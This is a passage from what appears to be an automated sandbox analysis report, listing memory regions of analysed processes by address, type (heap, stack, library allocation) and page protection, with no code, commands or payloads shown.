trusted library allocation
|
page read and write
|
||
|
17A21192000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF84915E000
|
trusted library allocation
|
page read and write
|
||
|
18E6BFF000
|
stack
|
page read and write
|
||
|
191963D0000
|
trusted library section
|
page read and write
|
||
|
FE192FC000
|
stack
|
page read and write
|
||
|
7B10CFF000
|
stack
|
page read and write
|
||
|
15BEDFB3000
|
heap
|
page read and write
|
||
|
6F684FE000
|
stack
|
page read and write
|
||
|
2272EBAC000
|
heap
|
page read and write
|
||
|
2BB9472A000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
22746E62000
|
heap
|
page read and write
|
||
|
4F333FF000
|
stack
|
page read and write
|
||
|
17A22B50000
|
heap
|
page readonly
|
||
|
2F286080000
|
heap
|
page read and write
|
||
|
17A33291000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
15ECF406000
|
heap
|
page read and write
|
||
|
15ECF3DB000
|
heap
|
page read and write
|
||
|
22730311000
|
trusted library allocation
|
page read and write
|
||
|
17A20F60000
|
heap
|
page read and write
|
||
|
55A998E000
|
stack
|
page read and write
|
||
|
2272CD20000
|
heap
|
page execute and read and write
|
||
|
55A8CBC000
|
stack
|
page read and write
|
||
|
17A211E0000
|
heap
|
page read and write
|
||
|
25C69040000
|
heap
|
page read and write
|
||
|
17A3B26C000
|
heap
|
page read and write
|
||
|
19196400000
|
trusted library allocation
|
page read and write
|
||
|
5852DFE000
|
stack
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
17A248B5000
|
trusted library allocation
|
page read and write
|
||
|
25C6765E000
|
heap
|
page read and write
|
||
|
2272E750000
|
heap
|
page execute and read and write
|
||
|
15BEE200000
|
heap
|
page read and write
|
||
|
15B81645000
|
trusted library allocation
|
page read and write
|
||
|
4AF3C7E000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3F5000
|
heap
|
page read and write
|
||
|
7B10DFE000
|
stack
|
page read and write
|
||
|
2BB945D0000
|
heap
|
page read and write
|
||
|
2F284681000
|
heap
|
page read and write
|
||
|
227302A7000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
2272CB5E000
|
heap
|
page read and write
|
||
|
17A22CD5000
|
heap
|
page read and write
|
||
|
2F284620000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
7B1210D000
|
stack
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
58532BE000
|
stack
|
page read and write
|
||
|
4AF39FD000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15BEE24C000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
585343B000
|
stack
|
page read and write
|
||
|
22746E98000
|
heap
|
page read and write
|
||
|
25C6763C000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
15BEE222000
|
heap
|
page read and write
|
||
|
27F6F3D0000
|
heap
|
page read and write
|
||
|
17A21365000
|
heap
|
page read and write
|
||
|
25C67670000
|
heap
|
page read and write
|
||
|
2272E5FB000
|
heap
|
page read and write
|
||
|
6F688FE000
|
stack
|
page read and write
|
||
|
15BEC050000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
2272CB66000
|
heap
|
page read and write
|
||
|
191A81F9000
|
trusted library allocation
|
page read and write
|
||
|
19198191000
|
trusted library allocation
|
page read and write
|
||
|
17A23452000
|
trusted library allocation
|
page read and write
|
||
|
191962B4000
|
heap
|
page read and write
|
||
|
25C6766B000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
15ECF410000
|
heap
|
page read and write
|
||
|
15BEC098000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
191963C0000
|
trusted library section
|
page read and write
|
||
|
5852FFD000
|
stack
|
page read and write
|
||
|
191B03B0000
|
heap
|
page read and write
|
||
|
191B05D2000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
17A24AE5000
|
trusted library allocation
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
17A24979000
|
trusted library allocation
|
page read and write
|
||
|
21229D40000
|
heap
|
page read and write
|
||
|
2DF13EE000
|
unkown
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
2F2861A0000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
19199A68000
|
trusted library allocation
|
page read and write
|
||
|
25C67631000
|
heap
|
page read and write
|
||
|
15ECF310000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
25C6766C000
|
heap
|
page read and write
|
||
|
15ECF3CD000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
17A21060000
|
heap
|
page read and write
|
||
|
227302DD000
|
trusted library allocation
|
page read and write
|
||
|
18E6CFE000
|
stack
|
page read and write
|
||
|
15ECF3A8000
|
heap
|
page read and write
|
||
|
7B10FFD000
|
stack
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
17A2488D000
|
trusted library allocation
|
page read and write
|
||
|
55A8B7D000
|
stack
|
page read and write
|
||
|
1F5CBBC0000
|
heap
|
page read and write
|
||
|
27F6D490000
|
heap
|
page read and write
|
||
|
58531B9000
|
stack
|
page read and write
|
||
|
25C67610000
|
heap
|
page read and write
|
||
|
17A2491C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17A33221000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
22746DD0000
|
heap
|
page read and write
|
||
|
2272EBA3000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
191B0313000
|
heap
|
page read and write
|
||
|
191963E0000
|
trusted library allocation
|
page read and write
|
||
|
191964D5000
|
heap
|
page read and write
|
||
|
191999E1000
|
trusted library allocation
|
page read and write
|
||
|
17A3B311000
|
heap
|
page read and write
|
||
|
2272EB79000
|
heap
|
page read and write
|
||
|
8981AFF000
|
stack
|
page read and write
|
||
|
15BEDF00000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
25C69060000
|
heap
|
page read and write
|
||
|
2BB9472A000
|
heap
|
page read and write
|
||
|
7B10EFF000
|
stack
|
page read and write
|
||
|
22746DFE000
|
heap
|
page read and write
|
||
|
15BEC058000
|
heap
|
page read and write
|
||
|
17A22CB0000
|
heap
|
page execute and read and write
|
||
|
227302C1000
|
trusted library allocation
|
page read and write
|
||
|
17A22ED0000
|
heap
|
page read and write
|
||
|
19199A2C000
|
trusted library allocation
|
page read and write
|
||
|
17A24881000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490DC000
|
trusted library allocation
|
page read and write
|
||
|
19197FF3000
|
trusted library allocation
|
page read and write
|
||
|
17A22B93000
|
trusted library allocation
|
page read and write
|
||
|
2BB94759000
|
heap
|
page read and write
|
||
|
15ECF39C000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
2BB946B0000
|
heap
|
page read and write
|
||
|
4AF367E000
|
stack
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
15BEE1F0000
|
heap
|
page read and write
|
||
|
25C67647000
|
heap
|
page read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
4AF36FE000
|
stack
|
page read and write
|
||
|
7B11079000
|
stack
|
page read and write
|
||
|
4AF484E000
|
stack
|
page read and write
|
||
|
15BEE008000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
2BB944D0000
|
heap
|
page read and write
|
||
|
25C67698000
|
heap
|
page read and write
|
||
|
27F6D546000
|
heap
|
page read and write
|
||
|
FE18AFE000
|
stack
|
page read and write
|
||
|
15BEC183000
|
trusted library allocation
|
page read and write
|
||
|
FE189FE000
|
stack
|
page read and write
|
||
|
55A85F2000
|
stack
|
page read and write
|
||
|
15BEBE80000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
17A3B420000
|
heap
|
page read and write
|
||
|
55A8E3E000
|
stack
|
page read and write
|
||
|
25C6766C000
|
heap
|
page read and write
|
||
|
55A887E000
|
stack
|
page read and write
|
||
|
15BEDF52000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
15BEE253000
|
heap
|
page read and write
|
||
|
17A21177000
|
heap
|
page read and write
|
||
|
55A9943000
|
stack
|
page read and write
|
||
|
25C67510000
|
heap
|
page read and write
|
||
|
21229AD0000
|
heap
|
page read and write
|
||
|
17A211DC000
|
heap
|
page read and write
|
||
|
27F6D56E000
|
heap
|
page read and write
|
||
|
17A2486C000
|
trusted library allocation
|
page read and write
|
||
|
191962AE000
|
heap
|
page read and write
|
||
|
17A24ABA000
|
trusted library allocation
|
page read and write
|
||
|
5852F7E000
|
stack
|
page read and write
|
||
|
15ECF3FD000
|
heap
|
page read and write
|
||
|
89817FE000
|
stack
|
page read and write
|
||
|
2F2846CD000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15BEE006000
|
heap
|
page read and write
|
||
|
20D909F8000
|
heap
|
page read and write
|
||
|
191A81A1000
|
trusted library allocation
|
page read and write
|
||
|
15BEBFC0000
|
heap
|
page read and write
|
||
|
25C6AD50000
|
trusted library allocation
|
page read and write
|
||
|
15B8022C000
|
trusted library allocation
|
page read and write
|
||
|
2F28488D000
|
heap
|
page read and write
|
||
|
227302A4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
55A8A7E000
|
stack
|
page read and write
|
||
|
2272CC14000
|
heap
|
page read and write
|
||
|
15B81B5B000
|
trusted library allocation
|
page read and write
|
||
|
19198180000
|
heap
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
22730828000
|
trusted library allocation
|
page read and write
|
||
|
20D90C65000
|
heap
|
page read and write
|
||
|
55A8EB8000
|
stack
|
page read and write
|
||
|
5852C72000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
27F6D519000
|
heap
|
page read and write
|
||
|
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
|
15ECF388000
|
heap
|
page read and write
|
||
|
15ECF3D6000
|
heap
|
page read and write
|
||
|
27F6D4A0000
|
heap
|
page read and write
|
||
|
5852EFE000
|
stack
|
page read and write
|
||
|
17A22E20000
|
heap
|
page execute and read and write
|
||
|
191B0210000
|
heap
|
page execute and read and write
|
||
|
19196420000
|
trusted library allocation
|
page read and write
|
||
|
BE882FB000
|
stack
|
page read and write
|
||
|
17A24012000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
17A3B424000
|
heap
|
page read and write
|
||
|
15ECF3AE000
|
heap
|
page read and write
|
||
|
2F284695000
|
heap
|
page read and write
|
||
|
17A2119E000
|
heap
|
page read and write
|
||
|
25C67430000
|
heap
|
page read and write
|
||
|
17A211A0000
|
heap
|
page read and write
|
||
|
4AF3B7E000
|
stack
|
page read and write
|
||
|
21229A50000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5853F4E000
|
stack
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3A1000
|
heap
|
page read and write
|
||
|
21229A80000
|
heap
|
page read and write
|
||
|
4F3367F000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
2BB94709000
|
heap
|
page read and write
|
||
|
25C693B2000
|
heap
|
page read and write
|
||
|
15B90071000
|
trusted library allocation
|
page read and write
|
||
|
15BEC040000
|
heap
|
page readonly
|
||
|
25C67647000
|
heap
|
page read and write
|
||
|
6F689FE000
|
stack
|
page read and write
|
||
|
22747080000
|
heap
|
page read and write
|
||
|
15ED1240000
|
heap
|
page read and write
|
||
|
2272CD73000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB5000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
17A22B90000
|
trusted library allocation
|
page read and write
|
||
|
2272CAE0000
|
heap
|
page read and write
|
||
|
191962F5000
|
heap
|
page read and write
|
||
|
15B8160F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1919977E000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
191A8191000
|
trusted library allocation
|
page read and write
|
||
|
17A21194000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
191983BD000
|
trusted library allocation
|
page read and write
|
||
|
5853138000
|
stack
|
page read and write
|
||
|
25C67631000
|
heap
|
page read and write
|
||
|
BE880FE000
|
stack
|
page read and write
|
||
|
FE190FD000
|
stack
|
page read and write
|
||
|
17A211DA000
|
heap
|
page read and write
|
||
|
15ECF3CD000
|
heap
|
page read and write
|
||
|
15ECF402000
|
heap
|
page read and write
|
||
|
15BEBF80000
|
heap
|
page read and write
|
||
|
2272CD70000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
2272CE45000
|
heap
|
page read and write
|
||
|
25C6766A000
|
heap
|
page read and write
|
||
|
2BB94704000
|
heap
|
page read and write
|
||
|
2272EAE4000
|
heap
|
page read and write
|
||
|
19199780000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
2272CB64000
|
heap
|
page read and write
|
||
|
15BEBF60000
|
heap
|
page read and write
|
||
|
17A3B2A7000
|
heap
|
page read and write
|
||
|
4F332FB000
|
stack
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
15ED1248000
|
heap
|
page read and write
|
||
|
2272CB6C000
|
heap
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
2273EE7E000
|
trusted library allocation
|
page read and write
|
||
|
2272CCF0000
|
trusted library allocation
|
page read and write
|
||
|
15B8187F000
|
trusted library allocation
|
page read and write
|
||
|
6F686FE000
|
stack
|
page read and write
|
||
|
8981CFE000
|
stack
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
FE188FA000
|
stack
|
page read and write
|
||
|
17A3B400000
|
heap
|
page read and write
|
||
|
27F6D7D5000
|
heap
|
page read and write
|
||
|
17A3B51E000
|
heap
|
page read and write
|
||
|
15ECF42B000
|
heap
|
page read and write
|
||
|
25C6763C000
|
heap
|
page read and write
|
||
|
15ECF2E0000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
15BEC1C0000
|
trusted library allocation
|
page read and write
|
||
|
2BB946DA000
|
heap
|
page read and write
|
||
|
2273054C000
|
trusted library allocation
|
page read and write
|
||
|
15B80001000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
17A3B422000
|
heap
|
page read and write
|
||
|
5852D7F000
|
stack
|
page read and write
|
||
|
15ECF3AE000
|
heap
|
page read and write
|
||
|
17A211B2000
|
heap
|
page read and write
|
||
|
2DF16FE000
|
stack
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
7FF849026000
|
trusted library allocation
|
page read and write
|
||
|
25C6762C000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
15B90001000
|
trusted library allocation
|
page read and write
|
||
|
2272CE07000
|
heap
|
page execute and read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3CF000
|
heap
|
page read and write
|
||
|
25C6768E000
|
heap
|
page read and write
|
||
|
17A3B561000
|
heap
|
page read and write
|
||
|
2F284656000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
15ECF401000
|
heap
|
page read and write
|
||
|
55A9A8D000
|
stack
|
page read and write
|
||
|
15ECF3F5000
|
heap
|
page read and write
|
||
|
2272EAE8000
|
heap
|
page read and write
|
||
|
2BB9472A000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
2272ECC0000
|
heap
|
page read and write
|
||
|
55A897E000
|
stack
|
page read and write
|
||
|
25C676B7000
|
heap
|
page read and write
|
||
|
2F284649000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
19198033000
|
trusted library allocation
|
page read and write
|
||
|
7B11DCE000
|
stack
|
page read and write
|
||
|
27F6D510000
|
heap
|
page read and write
|
||
|
2F284880000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
2272CE00000
|
heap
|
page execute and read and write
|
||
|
27F6D574000
|
heap
|
page read and write
|
||
|
17A22E60000
|
heap
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
15BEC030000
|
trusted library allocation
|
page read and write
|
||
|
8981BFF000
|
stack
|
page read and write
|
||
|
55A8F3B000
|
stack
|
page read and write
|
||
|
2BB94680000
|
heap
|
page read and write
|
||
|
19197FF0000
|
trusted library allocation
|
page read and write
|
||
|
7B110F8000
|
stack
|
page read and write
|
||
|
6F687FF000
|
stack
|
page read and write
|
||
|
2F284695000
|
heap
|
page read and write
|
||
|
191B0320000
|
heap
|
page read and write
|
||
|
4AF387B000
|
stack
|
page read and write
|
||
|
15ED0E00000
|
heap
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
20D90850000
|
heap
|
page read and write
|
||
|
17A3B547000
|
heap
|
page read and write
|
||
|
2BB946DD000
|
heap
|
page read and write
|
||
|
15B81340000
|
trusted library allocation
|
page read and write
|
||
|
1F5CBC50000
|
heap
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
25C6769A000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3DE000
|
heap
|
page read and write
|
||
|
191964D0000
|
heap
|
page read and write
|
||
|
25C67650000
|
heap
|
page read and write
|
||
|
15ECF2F0000
|
heap
|
page read and write
|
||
|
19196410000
|
heap
|
page readonly
|
||
|
25C67570000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
191994D2000
|
trusted library allocation
|
page read and write
|
||
|
4AF3AF6000
|
stack
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
17A3B2F0000
|
heap
|
page read and write
|
||
|
2272EAEA000
|
heap
|
page read and write
|
||
|
7DF4A1640000
|
trusted library allocation
|
page execute and read and write
|
||
|
55A8C3E000
|
stack
|
page read and write
|
||
|
17A2487F000
|
trusted library allocation
|
page read and write
|
||
|
15ED2BF0000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C676B7000
|
heap
|
page read and write
|
||
|
4AF3DFE000
|
stack
|
page read and write
|
||
|
15ECF40C000
|
heap
|
page read and write
|
||
|
15ECF3FD000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
22730521000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3B5000
|
heap
|
page read and write
|
||
|
27F6D53B000
|
heap
|
page read and write
|
||
|
15ECF380000
|
heap
|
page read and write
|
||
|
19196270000
|
heap
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
6F68AFF000
|
stack
|
page read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
17A2492D000
|
trusted library allocation
|
page read and write
|
||
|
15B81602000
|
trusted library allocation
|
page read and write
|
||
|
585404C000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
15B818DA000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
2272EF4C000
|
trusted library allocation
|
page read and write
|
||
|
55A8FBB000
|
stack
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
15BEE046000
|
heap
|
page execute and read and write
|
||
|
BE87DFE000
|
stack
|
page read and write
|
||
|
22746E6D000
|
heap
|
page read and write
|
||
|
6F682F9000
|
stack
|
page read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
15BEC180000
|
trusted library allocation
|
page read and write
|
||
|
25C67575000
|
heap
|
page read and write
|
||
|
15ECF3F5000
|
heap
|
page read and write
|
||
|
19198060000
|
heap
|
page execute and read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
BE5F17F000
|
unkown
|
page read and write
|
||
|
BE87CFE000
|
stack
|
page read and write
|
||
|
7B11F8E000
|
stack
|
page read and write
|
||
|
4AF3B77000
|
stack
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2272EAE0000
|
heap
|
page read and write
|
||
|
15B90011000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
17A3B314000
|
heap
|
page read and write
|
||
|
2272CBA6000
|
heap
|
page read and write
|
||
|
15BEDFA2000
|
heap
|
page read and write
|
||
|
17A24B40000
|
trusted library allocation
|
page read and write
|
||
|
1F5CBF50000
|
heap
|
page read and write
|
||
|
27F6F080000
|
heap
|
page read and write
|
||
|
17A3B5D0000
|
heap
|
page read and write
|
||
|
15BEC0DA000
|
heap
|
page read and write
|
||
|
17A248D5000
|
trusted library allocation
|
page read and write
|
||
|
7B1137C000
|
stack
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
15BEC230000
|
heap
|
page read and write
|
||
|
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
|
BE87AFD000
|
stack
|
page read and write
|
||
|
15B81606000
|
trusted library allocation
|
page read and write
|
||
|
FE18FFE000
|
stack
|
page read and write
|
||
|
2F284720000
|
heap
|
page read and write
|
||
|
19196480000
|
heap
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
18E69FF000
|
stack
|
page read and write
|
||
|
2BB94711000
|
heap
|
page read and write
|
||
|
15BEE0E0000
|
heap
|
page read and write
|
||
|
2BB946DC000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
17A24DC3000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
2272EAF7000
|
heap
|
page read and write
|
||
|
2272CA70000
|
heap
|
page read and write
|
||
|
58530BF000
|
stack
|
page read and write
|
||
|
2BB9471A000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3B5000
|
heap
|
page read and write
|
||
|
15BEC235000
|
heap
|
page read and write
|
||
|
7B113FB000
|
stack
|
page read and write
|
||
|
15ECF3FD000
|
heap
|
page read and write
|
||
|
2272CAA0000
|
heap
|
page read and write
|
||
|
22746CD0000
|
heap
|
page read and write
|
||
|
89819FE000
|
stack
|
page read and write
|
||
|
2272ED45000
|
trusted library allocation
|
page read and write
|
||
|
FE18EFE000
|
stack
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
5852CFF000
|
stack
|
page read and write
|
||
|
19199CE9000
|
trusted library allocation
|
page read and write
|
||
|
20D909F0000
|
heap
|
page read and write
|
||
|
2272CB7E000
|
heap
|
page read and write
|
||
|
15BEE040000
|
heap
|
page execute and read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
25C67693000
|
heap
|
page read and write
|
||
|
227302D8000
|
trusted library allocation
|
page read and write
|
||
|
17A2119C000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
19199DAE000
|
trusted library allocation
|
page read and write
|
||
|
2273ECE1000
|
trusted library allocation
|
page read and write
|
||
|
55A8AFE000
|
stack
|
page read and write
|
||
|
22730313000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
4AF48CD000
|
stack
|
page read and write
|
||
|
17A3B56C000
|
heap
|
page read and write
|
||
|
15ECF3B5000
|
heap
|
page read and write
|
||
|
17A3B3F0000
|
heap
|
page execute and read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
25C6766F000
|
heap
|
page read and write
|
||
|
19196160000
|
heap
|
page read and write
|
||
|
4AF37FE000
|
stack
|
page read and write
|
||
|
55A8DBE000
|
stack
|
page read and write
|
||
|
585333F000
|
stack
|
page read and write
|
||
|
2BB948D0000
|
heap
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
5853239000
|
stack
|
page read and write
|
||
|
17A232AA000
|
trusted library allocation
|
page read and write
|
||
|
2BB94712000
|
heap
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
18E6399000
|
stack
|
page read and write
|
||
|
2272CE40000
|
heap
|
page read and write
|
||
|
25C6765F000
|
heap
|
page read and write
|
||
|
15ECF3DF000
|
heap
|
page read and write
|
There are 838 hidden memdumps, click here to show them.